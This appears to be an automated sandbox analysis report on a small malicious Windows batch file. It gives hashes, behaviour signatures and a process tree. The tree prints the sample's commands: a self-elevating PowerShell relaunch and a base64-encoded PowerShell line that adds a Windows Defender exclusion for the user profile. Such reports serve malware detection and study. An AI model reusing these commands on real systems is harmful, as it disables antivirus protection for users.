Analysis
-
max time kernel
119s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
11/10/2023, 20:43
Static task
static1
Behavioral task
behavioral1
Sample
613bb088d6d7e0cfb3acf1037adab8eb36ddd2203c3646388a9cfaa7585e2b38.bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
613bb088d6d7e0cfb3acf1037adab8eb36ddd2203c3646388a9cfaa7585e2b38.bat
Resource
win10v2004-20230915-en
General
-
Target
613bb088d6d7e0cfb3acf1037adab8eb36ddd2203c3646388a9cfaa7585e2b38.bat
-
Size
500B
-
MD5
c7e2ec60b2f5e2d1061e128318cd3f61
-
SHA1
54b2846e89d35a67698765d0b3920a1f05784bdd
-
SHA256
613bb088d6d7e0cfb3acf1037adab8eb36ddd2203c3646388a9cfaa7585e2b38
-
SHA512
8faabdcd2caf1e282ff7e6f5971a60e957ba5355d12a35db4b61b3de0672d9983791f4b05fab5656459733f188eb531749f64632619c9c192c31570b8a523869
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 2712 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1624 powershell.exe Token: SeDebugPrivilege 2712 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2084 wrote to memory of 1624 2084 cmd.exe 29 PID 2084 wrote to memory of 1624 2084 cmd.exe 29 PID 2084 wrote to memory of 1624 2084 cmd.exe 29 PID 1624 wrote to memory of 2584 1624 powershell.exe 30 PID 1624 wrote to memory of 2584 1624 powershell.exe 30 PID 1624 wrote to memory of 2584 1624 powershell.exe 30 PID 2584 wrote to memory of 2712 2584 cmd.exe 32 PID 2584 wrote to memory of 2712 2584 cmd.exe 32 PID 2584 wrote to memory of 2712 2584 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\613bb088d6d7e0cfb3acf1037adab8eb36ddd2203c3646388a9cfaa7585e2b38.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\613bb088d6d7e0cfb3acf1037adab8eb36ddd2203c3646388a9cfaa7585e2b38.bat' -ArgumentList 'am_admin'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\613bb088d6d7e0cfb3acf1037adab8eb36ddd2203c3646388a9cfaa7585e2b38.bat" am_admin3⤵
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAVgBhAHIAaQBhAGIAbABlACgAJwBVAFMARQBSAFAAUgBPAEYASQBMAEUAJwApACAAKwAgACcAJwApAA==4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5391ceb5b567adbb448b6d75fbbd5778f
SHA1169dc0ab681e6fc7a28bcaff24027b4164aab88f
SHA25680a0372a7304d947b0b5e41ddf93369ba202287226c784dcbfecc9f628d9d188
SHA51275eb26ebf2c69f9b496ef98e23f666d1aa0b0f4a5ba6c09b6b9bc5b07c80eb52209ca9577618c043f084560672d45cfc62771c7b6f4ce599fee3582d5e4e15c7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GJJPU5F0D6JPKENCHGKN.temp
Filesize7KB
MD5391ceb5b567adbb448b6d75fbbd5778f
SHA1169dc0ab681e6fc7a28bcaff24027b4164aab88f
SHA25680a0372a7304d947b0b5e41ddf93369ba202287226c784dcbfecc9f628d9d188
SHA51275eb26ebf2c69f9b496ef98e23f666d1aa0b0f4a5ba6c09b6b9bc5b07c80eb52209ca9577618c043f084560672d45cfc62771c7b6f4ce599fee3582d5e4e15c7